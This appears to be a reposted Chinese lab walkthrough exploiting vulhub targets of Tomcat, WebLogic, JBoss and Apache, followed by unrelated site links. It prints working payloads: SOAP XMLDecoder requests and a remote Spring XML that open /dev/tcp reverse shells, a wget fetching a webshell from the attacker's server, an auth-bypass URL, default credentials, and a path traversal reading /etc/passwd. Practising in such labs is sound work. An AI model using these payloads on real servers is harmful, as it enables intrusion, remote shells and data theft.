Tomcat,WebLogic等中間件漏洞實戰解析

1.tomact

CVE-2017-12615

首先啟動環境,這里所有的漏洞都是在vulhub中的

然后去訪問我們的網站

點擊打開哥斯拉去生成一個jsp木馬

然后打開抓包,刷新一下頁面,修改put方法將我們的木馬上傳一下,這里需要在jsp后加一個/,來繞過對jsp文件的上傳限制

然后去訪問一下我們上傳的1.jsp

可以看到訪問成功,我們去用哥斯拉鏈接一下

后臺弱口令部署war包

這里需要啟動tomcat8,我們cd到tomcat8中啟動一下環境

然后去訪問一下

通過弱口令我們登錄到后臺,點擊managerapp,賬號密碼都為tomcat

登錄好后我們將我們上一關所生成的jsp木馬壓縮一下,修改一下后綴

點擊一下,圖示所指向的list,然后就可以在下方上傳文件了,將我們的war包上傳上去

訪問一下我們的war包中的jsp文件

最后使用哥斯拉連接即可

CVE-2020-1938

首先cd到我們的CVE-2020-1938中,然后啟動環境

這里我們使用腳本來進行

cmd運行我們的腳本文件,注意這里需要用到python2

運行我們的腳本

python CVE-2020-1938.py -p 8009 -f /WEB-INF/web.xml 靶場的IP

就可以讀取到文件了

2.WebLogic

后臺弱口令getshell

首先cd到我們的靶場并啟動

cd vulhub-master/weblogic/weak_password
docker-compose up -d

訪問一下7001端口,這個頁面就是開啟成功了

我們訪問一下console目錄,等一會我們的后臺登錄頁面就啟動好了

使用弱口令登錄即可

weblogic Oracle@123
然后就可以跳到后臺頁面,這里我們點擊部署然后點安裝
會跳轉到上傳的界面
點擊上載文件,然后瀏覽
上傳我們之前的war包即可
然后一直點擊下一步,到這個頁面時點擊安裝即可
然后就可以看到我們的war包已經被上傳成功
然后訪問1/1.jsp路徑即可訪問到我們的jsp木馬,使用哥斯拉連接即可

CVE-2017-3506

這個漏洞依舊使用我們上個漏洞開的環境,去訪問一下/wls-wsat/CoordinatorPortType,如果存在即有這個漏洞

然后我們就可以構造post請求來反彈shell了,刷新頁面然后抓包

然后右鍵修改請求方法為post方法,這里我們發送到重放器中便于操作

然后添加我們的請求字段同時修改一下請求格式

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.8.0_131" class="java.beans.XMLDecoder"><object class="java.lang.ProcessBuilder"><array class="java.lang.String" length="3"><void index="0"><string>/bin/bash</string></void><void index="1"><string>-c</string></void><void index="2"><string>bash -i &gt;&amp; /dev/tcp/監聽機的IP/監聽的端口 0&gt;&amp;1</string></void></array><void method="start"/></object></java></work:WorkContext></soapenv:Header><soapenv:Body/>
</soapenv:Envelope>

然后開啟監聽,點擊發送即可反彈shell

CVE-2019-2725

這一個漏洞和上一個的步驟都差不多,我們依舊是利用weak_password這個容器

首先我們拼接這個字段/_async/AsyncResponseService來驗證一下漏洞是否存在

出現上述頁面即為存在,然后和上一個一樣,刷新然后開啟抓包

修改為POST請求然后發送到重放器,寫入我們的請求包,修改類型和上一個一樣為text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing"
xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>wget http://服務器IP/2.txt -O servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/678.jsp
</string>
</void>
</array>
<void method="start"/></void>
</work:WorkContext>
</soapenv:Header><soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body></soapenv:Envelope>

注意這里,我們需要在我們的服務器上開啟http服務,將我們的木馬文件改為txt模式,上傳到我們的網站中,讓他從我們的網站中下載我們的木馬文件,并保存為22.jsp

點擊發送即可,可以根據這里的完成判斷有沒有上傳成功

然后訪問這個路徑即可訪問到我們的木馬文件,然后去哥斯拉連接即可

CVE-2018-2628

首先啟動環境

訪問一下

這里我們直接利用工具箱

CVE-2018-2894

首先啟動環境

cd vulhub-master/weblogic/CVE-2018-2894 
docker-compose up -d

然后我們需要先獲取一下密碼,因為這一關的密碼是隨機生成的

然后使用我們的密碼去登錄即可

然后進入到后臺界面,點擊base然后再點擊高級

然后勾選這個

然后在IP端口后拼接這個目錄

修改箭頭所指的位置為

/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

點擊提交,然后點擊安全,點擊添加

然后上傳我們的木馬腳本文件

F12查看一下ID在代碼中所對應的值

然后去拼接路徑,就可以訪問到我們的木馬,哥斯拉連接即可

CVE-2020-14882

首先啟動環境

cd vulhub-master/weblogic/CVE-2020-14882 
docker-compose up -d

通過這個連接可以訪問管理控制臺,但是需要我們登錄

http://IP:端口/console/login/LoginForm.jsp
那么我們可以利用拼接這個路徑來進行繞過登錄
/console/css/%252e%252e%252fconsole.portal
然后我們可以利用另一個漏洞來遠程加載xml文件獲取shell通過這個路徑來
/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("java.lang.Runti me.getRuntime().exec('touch%20/tmp/success');")

連接兩個漏洞

然后就可以構造一個惡意類讓他去訪問

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://www.springframework.org/schema/beanshttp://www.springframework.org/schema/beans/spring-beans.xsd"><bean id="pb" class="java.lang.ProcessBuilder" init-method="start"><constructor-arg><list><value>bash</value><value>-c</value><value><![CDATA[bash -i >& /dev/tcp/監聽的IP/8888 0>&1]]></value></list></constructor-arg></bean></beans>

然后通過這個讓我們的靶場去訪問這個實體類從而反彈shell

/console/css/%252e%252e%252fconsole.portal?_nfpb=true&_pageLabel=&handle=com.bea.core.repackaged.springframework.context.support.FileSystemXmlApplicationContext("http://開啟http服務的ip/1.xml")

3.Jboss

CVE-2015-7501

啟動環境

cd vulhub-master/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

然后去訪問

然后拼接這個地址

/invoker/JMXInvokerServlet,如果如下圖所示即為存在環境
這里我們利用ysoserial工具來進行操作
https://github.com/frohoff/ysoserial
將反彈shell的語句進行base64編碼
然后利用我們的工具生成一個ser文件
然后開啟監聽,執行這段命令,即可反彈shell
curl http://靶場IP/invoker/JMXInvokerServlet --data-binary @exp.ser

CVE-2017-7504

啟動環境

cd vulhub-master/jboss/CVE-2017-7504 
docker-compose up -d
訪問頁面
http://靶場IP:端口/jbossmq-httpil/HTTPServerILServlet
然后利用我們的腳本進行攻擊
即可反彈shell

CVE-2017-12149

啟動環境

cd vulhub-master/jboss/CVE-2017-12149 
docker-compose up -d

訪問這個地址,如果頁面是這個樣子即為存在漏洞

http://靶場IP:端口/invoker/readonly

然后利用我們的工具即可https://github.com/yunxu1/jboss-_CVE-2017-12149

Administration Console弱口令

環境沿用上一個

拼接路徑去訪問一下登錄界面

admin vulhub賬號和密碼,登陸后點擊
上傳我們之前的war包,然后步驟一樣,訪問然后連接

低版本JMX Console未授權

啟動環境

cd vulhub-master/jboss/CVE-2017-7504 
docker-compose up -d

訪問這個

賬號密碼都是admin,登錄之后選擇這個

然后開啟一個http服務,然后將我們的war包上傳到網站根目錄,將連接寫在value欄

注意這里制作war時需要注意,壓縮包的名字必須為英文,且與里面的jsp文件不能同名

然后去訪問,然后連接哥斯拉即可

?版本JMX Console未授權

啟動環境

cd vulhub-master/jboss/CVE-2017-12149 
docker-compose up -d

訪問這個路徑

賬號密碼admin vulhub,點擊這兩個地方

然后在這里,和上一關一樣,上傳我們服務器的war包

然后訪問,哥斯拉連接即可

4.Apache

CVE-2021-41773

這一關需要我們拉取環境

docker pull blueteamsteve/cve-2021-41773:no-cgid
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

然后用命令即可查看網站上的文件

curl http://靶場IP/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/diannao/93721.shtml
繁體地址,請注明出處:http://hk.pswp.cn/diannao/93721.shtml
英文地址,請注明出處:http://en.pswp.cn/diannao/93721.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

15、點云<—>深度圖轉換原理

* 定義虛擬相機分辨率. Width := 800 Height := 800* 定義一個系數用于在3D模型中計算圖像的邊緣 BorderFact := 1.5* 是否選擇鏡頭. IsTelecentric := false GenParamName := [lut,intensity,disp_pose_0,alpha_0,disp_background] GenParamValue := [hsi,coord_z,true,0.3,tr…

大疆無人機開發:MQTT 賦能機場系統集成的Java實戰之旅

目錄 集成實現步驟? 項目初始化? MQTT 連接配置? 大疆無人機與 MQTT 集成? 機場系統功能實現? 代碼實戰與案例分析? 示例代碼展示? 案例分析? 數據格式不匹配問題? 指令沖突問題? 性能優化與安全保障? 性能優化策略? 安全保障措施? 集成實現步驟? …

邏輯回歸詳解:從數學原理到實際應用

文章目錄一、邏輯回歸的核心思想&#xff1a;從線性到概率1. 線性回歸的局限與突破Sigmoid函數特性&#xff08;代碼可視化&#xff09;&#xff1a;2. 邏輯回歸的預測公式二、損失函數&#xff1a;如何學習最優參數&#xff1f;1. 對數損失函數的數學定義損失函數解析&#xf…

粒子群優化算法(Particle Swarm Optimization, PSO) 求解二維 Rastrigin 函數最小值問題

前言 提醒&#xff1a; 文章內容為方便作者自己后日復習與查閱而進行的書寫與發布&#xff0c;其中引用內容都會使用鏈接表明出處&#xff08;如有侵權問題&#xff0c;請及時聯系&#xff09;。 其中內容多為一次書寫&#xff0c;缺少檢查與訂正&#xff0c;如有問題或其他拓展…

【GitHub Workflows 基礎(二)】深入理解 on、jobs、steps 的核心語法與執行邏輯

&#x1f4d8; GitHub Workflows 基礎&#xff08;二&#xff09;&#xff1a;深入理解 on、jobs、steps 的核心語法與執行邏輯繼第一篇講完 .github/workflows/ 中多個工作流的結構后&#xff0c;本篇將深入 GitHub Actions 的核心三要素&#xff1a;on&#xff08;觸發器&…

React Filber及核心原理

1. React Fiber 的核心目標??增量渲染?&#xff1a;將大型更新拆解為可中斷的小任務&#xff08;時間切片&#xff09;&#xff0c;避免阻塞主線程?優先級調度?&#xff1a;動態管理任務執行順序&#xff08;如用戶交互 > 動畫 > 數據加載&#xff09;。與瀏覽器協作…

Shader開發(五)什么是渲染管線

在計算機圖形學中&#xff0c;渲染管線&#xff08;Rendering Pipeline&#xff09; 是圖形處理器&#xff08;GPU&#xff09;將3D網格數據轉化為屏幕圖像的核心流程。無論是炫酷的游戲畫面還是逼真的動畫場景&#xff0c;這一切都離不開渲染管線的默默工作。對于想要學習著色…

CentOS7 使用Docker安裝MinIO完整教程

目錄 1. MinIO簡介 什么是MinIO? 為什么選擇Docker安裝? 2. 環境準備 檢查Docker狀態 檢查防火墻設置 創建存儲目錄 3. 快速啟動MinIO 基礎啟動命令 驗證啟動狀態 4. 配置持久化存儲 停止并刪除臨時容器 使用數據卷啟動MinIO 驗證數據持久化 5. 訪問MinIO控制臺…

【數據庫】時序數據庫選型指南:從大數據視角看IoTDB的核心優勢

文章目錄前言-官網鏈接一、時序數據管理的時代挑戰二、時序數據庫選型的六大核心維度1. 數據模型設計2. 寫入與查詢性能3. 存儲效率4. 系統擴展性5. 生態兼容性6. 運維復雜度三、IoTDB的技術架構解析1. 存儲引擎創新2. 計算引擎優勢3. 分布式架構設計四、行業解決方案對比1. 能…

【25-cv-08364】Keith攜Hello Angel版權圖發案

Hello Angel版權圖案件號&#xff1a;25-cv-08364起訴時間&#xff1a;2025/7/22原告&#xff1a;Angelea Clark Van Dam原告律所&#xff1a;Keith受理法院&#xff1a;伊利諾伊州北區地方法院原告介紹原告是是一位來自澳大利亞的藝術家&#xff0c;筆名為Hello Angel&#xf…

SkSurface---像素的容器:表面

如果說 SkCanvas 是畫布&#xff0c;是所有繪圖操作的提供者的話&#xff0c;那么 SkSurface 就是畫布的容器&#xff0c;我們稱之為表面&#xff0c;它負責管理畫布對應的像素數據。這些像素數據可以是在內存中創建的&#xff0c;也可以是在 GPU 顯存中創建的。創建一個空白表…

26.(vue3.x+vite)以pinia為中心的開發模板

效果截圖 代碼實現 HelloWorld.vue <template><div style="padding: 20px;">介紹:<br>1:使用class 來減少pinia(store)的代碼量<br>

華為AI Agent智能園藝助手開發案例

一、引言與行業背景 在數字化與智能化日益滲透我們生活的今天&#xff0c;園藝這一傳統而充滿生機的領域&#xff0c;也迎來了智能化的革新。華為AI Agent智能園藝助手通過融合人工智能與園藝專業知識&#xff0c;為用戶提供一站式、個性化的園藝養護解決方案&#xff0c;徹底改…

Linux Flathub軟件管理方法 使用指南

Flathub 使用指南&#xff1a;軟件安裝、管理及常用軟件推薦 一. 什么是 Flathub&#xff1f; Flathub 是 Flatpak 應用程序的主要分發中心&#xff0c;類似于 Linux 上的"應用商店"。它提供了一種跨發行版的軟件打包和分發方式&#xff0c;讓用戶可以在任何 Linux 發…

GitLab 18.2 發布幾十項與 DevSecOps 有關的功能,可升級體驗【二】

沿襲我們的月度發布傳統&#xff0c;極狐GitLab 發布了 18.2 版本&#xff0c;該版本帶來了議題和任務的自定義工作流狀態、新的合并請求主頁、新的群組概覽合規儀表盤、下載安全報告的 PDF 導出文件、中心化的安全策略管理&#xff08;Beta&#xff09;等幾十個重點功能的改進…

??免費語音轉換服務(TTS)全面指南

????1. TTS技術概述?? TTS&#xff08;Text-to-Speech&#xff09;通過AI將文字轉化為自然語音&#xff0c;核心技術包括??深度神經網絡&#xff08;DNN&#xff09;??、??語音韻律建模??和??聲學合成??。其核心優勢在于&#xff1a; ??多語言支持??&a…

正則化都是放在模型的哪個位置呢?

? 什么是“正則化”&#xff1f;在神經網絡中&#xff0c;正則化&#xff08;Regularization&#xff09; 抑制過擬合的技巧 目的是讓模型在訓練集和測試集上都表現得好&#xff08;泛化能力強&#xff09;。&#x1f9e0; 常見的正則化手段包括&#xff1a;方法類型通常放在哪…

Python畢業設計 | 基于協同過濾的智能商品推薦與數據大屏系統(Vue+Flask+Scikit-learn,附源碼+文檔)

個人介紹&#x1f3af; 畢業設計私人教練 專注計算機畢設輔導第 6 年&#xff0c;累計 1v1 帶飛 800 同學順利通關。從選題、開題、代碼、論文到答辯&#xff0c;一條龍陪跑&#xff1b;擅長把導師的 “模糊要求” 變成能落地的技術方案。白天寫方案&#xff0c;晚上改論文&…

基于千問2.5-VL-7B訓練識別人的表情

一、安裝LLaMA-Factory 我們使用LLaMA-Factory來進行微調&#xff0c;安裝LLaMA-Factory來參考文章&#xff1a; 大模型微調工具LLaMA-Factory的安裝流程-CSDN博客 二、下載千問2.5-VL-7B模型 我們使用千問2.5-VL-7B多模態模型來進行微調 通義千問2.5-VL-7B-Instruct 下載…

Android屏幕適配:從dp到px的轉換與今日頭條適配方案詳解

前言 在Android開發中&#xff0c;屏幕適配一直是一個重要且復雜的話題。不同設備有著不同的屏幕尺寸、分辨率和像素密度&#xff0c;如何讓應用在各種設備上都能良好顯示&#xff0c;是每個開發者都需要面對的問題。本文將深入探討Android系統中dp到px的轉換原理&#xff0c;并…